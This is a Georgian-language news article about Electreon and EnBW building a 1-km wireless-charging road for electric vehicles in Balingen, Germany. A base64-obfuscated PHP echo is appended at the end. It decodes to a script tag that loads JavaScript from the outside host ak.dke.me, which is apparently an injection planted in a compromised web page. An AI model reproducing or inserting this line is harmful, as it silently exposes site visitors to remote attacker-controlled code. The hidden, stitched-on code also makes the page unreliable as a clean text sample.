celsiusi
ავერსი შნაიდერი
გერმანიაში ელექტრო მანქანების გამოყენებისთვის სრულ კომფორტს ქმნიან – ამის სესახებ ინფორმაციას Businesswire ავრცელებს. 
 
ქვეყანაში აგებენ გზას, რომელზე გადაადგილების დროსაც კომერციული და საქალაქო ელექტრო ტრანსპორტი უსადენოდ დაიმუხტება.
პროექტზე კომპანია Electreon მუშაობს, რადგან ის EV-ების უსადენო დატენვის კუთხით ერთ-ერთი გამორჩეული მწარმოებელია. ამას ადასტურებს მოპოვებული ჯილდოები, როგორც ეკომეგობრულობის, ისე წამყვანი ტექნოლოგიებისთვის. Electreon, ელექტრო ტრანსპორტის დამტენების უდიდეს გერმანულ მწარმოებელთან, EnBW-სთან ერთად, ქალაქ ბალინგენში გზის გასწვრივ 1-კილომეტრიან ელექტრულ სისტემას შექმნის.
ინიციატივის დეტალები უფრო კონკრეტულად რომ განვიხილოთ, ახალ ტექნოლოგიას ელექტრო მანქანების დამუხტვა ორგვარად შეეძლება: დინამიკურ და სტატიკურ მდგომარეობაში. თუ აქამდე EV-ების მფლობელებს კონკრეტული სივრცეების ძებნა უწევდათ მანქანის დასამუხტად, ახლა ეს გზა ამ პრობლემას ხსნის — ბატარეის მუშაობის ხანგრძლივობასაც უფრო დიდხანს უზრუნველყოფს, დამუხტვის პროცესი კი სრულიად უსაფრთხო და ძალიან სწრაფია.
289
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");